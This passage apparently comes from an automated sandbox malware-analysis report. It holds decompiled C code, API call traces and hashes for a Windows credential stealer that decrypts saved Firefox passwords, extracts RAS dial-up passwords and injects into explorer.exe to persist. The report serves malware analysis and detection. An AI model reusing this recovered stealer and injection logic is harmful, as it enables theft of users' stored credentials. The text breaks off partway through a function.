                                    • LoadLibraryA.KERNEL32(00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000,nssutil3.dll,\Mozilla Firefox\,0040F1D4,00000000,plds4.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A0DE
                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040A0EF
                                    • FreeLibrary.KERNEL32(?,00000000,0040A140,?,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000,nssutil3.dll), ref: 0040A128
                                    • FreeLibrary.KERNEL32(?,?,00000000,0040A140,?,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000), ref: 0040A131
                                    • GetProcAddress.KERNEL32(?,NSSBase64_DecodeBuffer), ref: 0040A161
                                    • FreeLibrary.KERNEL32(?,00000000,0040A1B1,?,?,NSSBase64_DecodeBuffer,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A199
                                    • FreeLibrary.KERNEL32(?,?,00000000,0040A1B1,?,?,NSSBase64_DecodeBuffer,?,NSS_Init,00000000,nss3.dll,\Mozilla Firefox\,0040F1D4,00000000,softokn3.dll,\Mozilla Firefox\), ref: 0040A1A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Library$Load$Free$AddressProc
                                    • String ID: ##$$$(unnamed password)$(unnamed value)$.$GetUserProfileDirectoryA$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$Path$Profile0$\Mozilla Firefox\$\Mozilla\Firefox\$\signons.txt$\signons1.txt$\signons2.txt$\signons3.txt$mozcrt19.dll$nspr4.dll$nss3.dll$nssutil3.dll$plc4.dll$plds4.dll$profiles.ini$softokn3.dll$sqlite3.dll$userenv.dll$|||
                                    • API String ID: 1394111170-1366083549
                                    • Opcode ID: bc6cc1cb9f016107f0c4384eb824cf31047fdf5ec1b06ae8e90ff8a76f323cc9
                                    • Instruction ID: 201494fd93d22ac66a3c34dbacb415299a5c5dabc6a14464f117945b5b77da43
                                    • Opcode Fuzzy Hash: bc6cc1cb9f016107f0c4384eb824cf31047fdf5ec1b06ae8e90ff8a76f323cc9
                                    • Instruction Fuzzy Hash: 79620970A10208ABDB11EBA5C842ADEB7B9EF44304F5044BBF504B72E1DB7CAE558F59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00404E10() {
                                    
                                    				if( *0x40e944 == 0) {
                                    					 *0x40e944 = GetModuleHandleA("kernel32.dll");
                                    					if( *0x40e944 != 0) {
                                    						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
                                    						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
                                    						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
                                    						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
                                    						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
                                    						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
                                    						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
                                    						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
                                    						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
                                    						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
                                    						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
                                    						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
                                    						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
                                    						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
                                    						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
                                    						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
                                    					}
                                    				}
                                    				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}


                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
                                    				intOrPtr _v4;
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				signed int _v3024;
                                    				signed int _v3028;
                                    				signed int _v3032;
                                    				signed int _v3036;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				signed int _v3296;
                                    				signed int _v3300;
                                    				intOrPtr* _t114;
                                    				void* _t131;
                                    
                                    				_push(__ebx);
                                    				_push(__edx | _a82);
                                    				asm("popad");
                                    				if(__ecx + 1 < 0) {
                                    					_t131 = __eax;
                                    					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
                                    					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
                                    				} else {
                                    					_push(__ebp);
                                    					__ebp = __esp;
                                    					__esp = __esp + 0xfffff328;
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_push(__edi);
                                    					__edx = 0;
                                    					_v3296 = 0;
                                    					_v3300 = 0;
                                    					_v3036 = 0;
                                    					_v3032 = 0;
                                    					_v32 = 0;
                                    					_v36 = 0;
                                    					_v40 = 0;
                                    					_v48 = 0;
                                    					_v52 = 0;
                                    					_v56 = 0;
                                    					_v16 = __eax;
                                    					__eax = 0;
                                    					_push(__ebp);
                                    					_push(0x40861b);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = __esp;
                                    					_v16 = E00401AC0(_v16);
                                    					_v28 = E00407FF0();
                                    					__eflags = _v28;
                                    					if(_v28 != 0) {
                                    						__eax = _v20;
                                    						_push(_v20);
                                    						__eax =  &_v24;
                                    						__ecx = 1;
                                    						__edx =  *0x408214; // 0x408218
                                    						__eax = E00402FBC();
                                    						__esp = __esp + 4;
                                    						__edx = _v24;
                                    						__eax = 0x108;
                                    						 *_v24 = 0x108;
                                    						__edx = 0x108 * _v20 >> 0x20;
                                    						__eax = 0x108 * _v20;
                                    						_v12 = 0x108 * _v20;
                                    						__eax =  &_v20;
                                    						_push( &_v20);
                                    						__eax =  &_v12;
                                    						_push( &_v12);
                                    						__eax = _v24;
                                    						_push(__eax);
                                    						_push(0);
                                    						_push(0);
                                    						L00407B84();
                                    						__eflags = __eax;
                                    						if(__eax == 0) {
                                    							_v200.dwOSVersionInfoSize = 0x94;
                                    							 &_v200 = GetVersionExA( &_v200);
                                    							__eax =  &_v28;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v28, 0x105);
                                    							__eax =  &_v32;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v32, 0x105);
                                    							__eflags = _v200.dwPlatformId - 2;
                                    							if(_v200.dwPlatformId == 2) {
                                    								__eflags = _v200.dwMajorVersion - 5;
                                    								if(_v200.dwMajorVersion >= 5) {
                                    									_push(0);
                                    									_push(0x1a);
                                    									__eax =  &_v28;
                                    									__eax = E00401F9C( &_v28);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3024;
                                    										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
                                    										__edx = _v3024;
                                    										 &_v28 = E00401B58( &_v28, _v3024);
                                    									}
                                    									_push(0);
                                    									_push(0x23);
                                    									__eax =  &_v32;
                                    									__eax = E00401F9C( &_v32);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3028;
                                    										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
                                    										__edx = _v3028;
                                    										 &_v32 = E00401B58( &_v32, _v3028);
                                    									}
                                    									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
                                    								}
                                    							}
                                    							_v36 = 0xffffffff;
                                    							__eax = _v20;
                                    							__eax = _v20 - 1;
                                    							__eflags = __eax;
                                    							if(__eax >= 0) {
                                    								_v52 = __eax;
                                    								__esi = 0;
                                    								__eflags = 0;
                                    								do {
                                    									_v1252 = 0x41c;
                                    									__esi = __esi << 5;
                                    									__ebx = (__esi << 5) + __esi;
                                    									__eax = _v24;
                                    									__eax = _v24 + 4 + __ebx * 8;
                                    									__edx =  &_v1248;
                                    									__ecx = 0x100;
                                    									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
                                    									_push( &_v36);
                                    									__eax =  &_v1252;
                                    									_push( &_v1252);
                                    									_push(0);
                                    									L00407B8C();
                                    									_v12 = 0x6e8;
                                    									__eax =  &_v3020;
                                    									__ecx = 0;
                                    									__edx = _v12;
                                    									E00401414( &_v3020, _v12) = _v12;
                                    									_v3020 = _v12;
                                    									 &_v12 =  &_v16;
                                    									__eax = _v24;
                                    									__edx = _v24 + 4 + __ebx * 8;
                                    									__ecx =  &_v3020;
                                    									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
                                    									__eflags = _v200.dwPlatformId - 2;
                                    									if(_v200.dwPlatformId == 2) {
                                    										__eflags = _v200.dwMajorVersion - 5;
                                    										if(_v200.dwMajorVersion >= 5) {
                                    											__eax = _v28;
                                    											__eflags =  *_v28;
                                    											if( *_v28 != 0) {
                                    												L17:
                                    												__eax =  &_v40;
                                    												__edx =  &_v1248;
                                    												__eax = E00401CAC( &_v40,  &_v1248);
                                    												__edx =  &_v44;
                                    												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
                                    												 &_v28 = E00401F9C( &_v28);
                                    												__eax = _v40;
                                    												__eax = E00401F48(_v40);
                                    												__edi = __eax;
                                    												__ebx = __eax;
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													__eax =  &_v32;
                                    													__eax = E00401F9C( &_v32);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v28 = E00401F9C( &_v28);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v32 = E00401F9C( &_v32);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx > 0) {
                                    													__eax = __ebx;
                                    													__edx = 0;
                                    													__eflags = 0;
                                    													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
                                    													__edx =  &_v3284;
                                    													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
                                    													__edi = 0x100;
                                    													__ebx = 0x40e9bc;
                                    													do {
                                    														__eax =  *__ebx;
                                    														__edx = _v48;
                                    														__eax = E00401E94( *__ebx, _v48);
                                    														if(__eflags == 0) {
                                    															__eflags =  *(__ebx + 4);
                                    															if( *(__ebx + 4) != 0) {
                                    																_t92 = __ebx + 4; // 0x0
                                    																__eax =  *_t92;
                                    																_push(E00401D50( *_t92));
                                    																_t93 = __ebx + 4; // 0x0
                                    																__eax =  *_t93;
                                    																__edx = E00401F48( *_t93);
                                    																__eax =  &_v476;
                                    																_pop(__ecx);
                                    																__eax = E00408038( &_v476, __ecx, __edx);
                                    															}
                                    														}
                                    														__ebx = __ebx + 8;
                                    														__edi = __edi - 1;
                                    														__eflags = __edi;
                                    													} while (__edi != 0);
                                    												}
                                    											} else {
                                    												__eax = _v32;
                                    												__eflags =  *_v32;
                                    												if( *_v32 != 0) {
                                    													goto L17;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									__eax =  &_v733;
                                    									__eflags =  &_v733;
                                    									if( &_v733 != 0) {
                                    										__eax =  &_v476;
                                    										__eflags =  &_v476;
                                    										if( &_v476 != 0) {
                                    											__eax = _v8;
                                    											_push( *_v8);
                                    											_push("RAS Passwords |");
                                    											__eax =  &_v3288;
                                    											__edx =  &_v733;
                                    											__eax = E00401CAC( &_v3288,  &_v733);
                                    											_push(_v3288);
                                    											_push(0x40865c);
                                    											__eax =  &_v3292;
                                    											__edx =  &_v476;
                                    											__eax = E00401CAC( &_v3292,  &_v476);
                                    											_push(_v3292);
                                    											_push(0x40865c);
                                    											_push(0x408668);
                                    											__eax = _v8;
                                    											__edx = 7;
                                    											E00401E10();
                                    										}
                                    									}
                                    									__esi = __esi + 1;
                                    									_t105 =  &_v52;
                                    									 *_t105 = _v52 - 1;
                                    									__eflags =  *_t105;
                                    								} while ( *_t105 != 0);
                                    							}
                                    						}
                                    					}
                                    					__eax = 0;
                                    					__eflags = 0;
                                    					_pop(__edx);
                                    					_pop(__ecx);
                                    					_pop(__ecx);
                                    					 *[fs:eax] = __edx;
                                    					_push(E00408622);
                                    					__eax =  &_v3292;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3292, 2);
                                    					__eax =  &_v3028;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3028, 2);
                                    					__eax =  &_v48;
                                    					__edx = 3;
                                    					__eax = E00401AE4( &_v48, 3);
                                    					__eax =  &_v32;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v32, 2);
                                    					__eax =  &_v24;
                                    					__edx =  *0x408214; // 0x408218
                                    					return E00402FC8( &_v24, __edx);
                                    				}
                                    			}
                                    0x00408230
                                    0x00408231
                                    0x00408232
                                    0x00408234
                                    0x004081c8
                                    0x004081cf
                                    0x004081ef
                                    0x00408238
                                    0x00408238
                                    0x00408239
                                    0x0040823b
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408244
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408273
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408291
                                    0x00408295
                                    0x0040829b
                                    0x0040829e
                                    0x0040829f
                                    0x004082a2
                                    0x004082a7
                                    0x004082ad
                                    0x004082b2
                                    0x004082b5
                                    0x004082b8
                                    0x004082bd
                                    0x004082bf
                                    0x004082bf
                                    0x004082c2
                                    0x004082c5
                                    0x004082c8
                                    0x004082c9
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082da
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x004082f8
                                    0x004082fb
                                    0x00408300
                                    0x00408305
                                    0x00408308
                                    0x0040830d
                                    0x00408312
                                    0x00408319
                                    0x0040831b
                                    0x00408322
                                    0x00408324
                                    0x00408326
                                    0x00408328
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x0040833c
                                    0x00408345
                                    0x0040834a
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835c
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408370
                                    0x00408379
                                    0x0040837e
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408322
                                    0x00408391
                                    0x00408398
                                    0x0040839b
                                    0x0040839c
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b6
                                    0x004083b9
                                    0x004083bb
                                    0x004083be
                                    0x004083c2
                                    0x004083c8
                                    0x004083d2
                                    0x004083d5
                                    0x004083d6
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083eb
                                    0x004083f1
                                    0x004083f3
                                    0x004083fb
                                    0x004083fe
                                    0x0040840a
                                    0x0040840e
                                    0x00408411
                                    0x00408415
                                    0x0040841d
                                    0x00408422
                                    0x00408429
                                    0x0040842f
                                    0x00408436
                                    0x0040843c
                                    0x0040843f
                                    0x00408442
                                    0x00408450
                                    0x00408450
                                    0x00408453
                                    0x00408459
                                    0x0040845e
                                    0x00408464
                                    0x0040846c
                                    0x00408479
                                    0x0040847c
                                    0x00408481
                                    0x00408489
                                    0x0040848b
                                    0x0040848d
                                    0x0040848f
                                    0x00408492
                                    0x004084a5
                                    0x004084a5
                                    0x004084a7
                                    0x004084a9
                                    0x004084ae
                                    0x004084bb
                                    0x004084be
                                    0x004084c9
                                    0x004084c9
                                    0x004084cb
                                    0x004084cd
                                    0x004084d2
                                    0x004084df
                                    0x004084e2
                                    0x004084ed
                                    0x004084ed
                                    0x004084ef
                                    0x004084f1
                                    0x004084f3
                                    0x004084f5
                                    0x004084f5
                                    0x004084ff
                                    0x00408504
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x0040851c
                                    0x0040851e
                                    0x00408521
                                    0x00408526
                                    0x00408528
                                    0x0040852c
                                    0x0040852e
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x00408537
                                    0x0040853f
                                    0x00408541
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040852c
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x00408436
                                    0x00408553
                                    0x00408559
                                    0x0040855b
                                    0x0040855d
                                    0x00408563
                                    0x00408565
                                    0x00408567
                                    0x0040856a
                                    0x0040856c
                                    0x00408571
                                    0x00408577
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x0040858d
                                    0x00408593
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085ae
                                    0x004085b1
                                    0x004085b6
                                    0x004085b6
                                    0x00408565
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c5
                                    0x004085c5
                                    0x004085c7
                                    0x004085c8
                                    0x004085c9
                                    0x004085ca
                                    0x004085cd
                                    0x004085d2
                                    0x004085d8
                                    0x004085dd
                                    0x004085e2
                                    0x004085e8
                                    0x004085ed
                                    0x004085f2
                                    0x004085f5
                                    0x004085fa
                                    0x004085ff
                                    0x00408602
                                    0x00408607
                                    0x0040860c
                                    0x0040860f
                                    0x0040861a
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				struct _PROCESS_INFORMATION _v24;
                                    				struct _STARTUPINFOA _v92;
                                    				char _v96;
                                    				intOrPtr _t21;
                                    				void* _t44;
                                    				intOrPtr* _t50;
                                    				intOrPtr _t53;
                                    				void* _t62;
                                    
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v96 = 0;
                                    				_push(_t62);
                                    				_push(0x40b8fa);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62 + 0xffffffa4;
                                    				_t50 =  *0x40d204; // 0x40e8f8
                                    				E00401D9C( &_v96, "_PERSIST",  *_t50);
                                    				_t44 = E00403568(0, 0, E00401F48(_v96));
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t44);
                                    					_t21 =  *0x40d1cc; // 0x40e924
                                    					_t59 = E00401F9C(_t21);
                                    					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
                                    						E00403738();
                                    						E00403738();
                                    						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
                                    						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
                                    					}
                                    				} else {
                                    					CloseHandle(_t44);
                                    				}
                                    				_pop(_t53);
                                    				 *[fs:eax] = _t53;
                                    				_push(E0040B901);
                                    				return E00401AC0( &_v96);
                                    			}

                                    0x0040b802
                                    0x0040b803
                                    0x0040b806
                                    0x0040b80b
                                    0x0040b80c
                                    0x0040b811
                                    0x0040b814
                                    0x0040b817
                                    0x0040b827
                                    0x0040b83e
                                    0x0040b84a
                                    0x0040b858
                                    0x0040b85d
                                    0x0040b867
                                    0x0040b87a
                                    0x0040b89c
                                    0x0040b8a6
                                    0x0040b8b3
                                    0x0040b8d3
                                    0x0040b8df
                                    0x0040b8df
                                    0x0040b84c
                                    0x0040b84d
                                    0x0040b84d
                                    0x0040b8e6
                                    0x0040b8e9
                                    0x0040b8ec
                                    0x0040b8f9

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				int _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				int _v28;
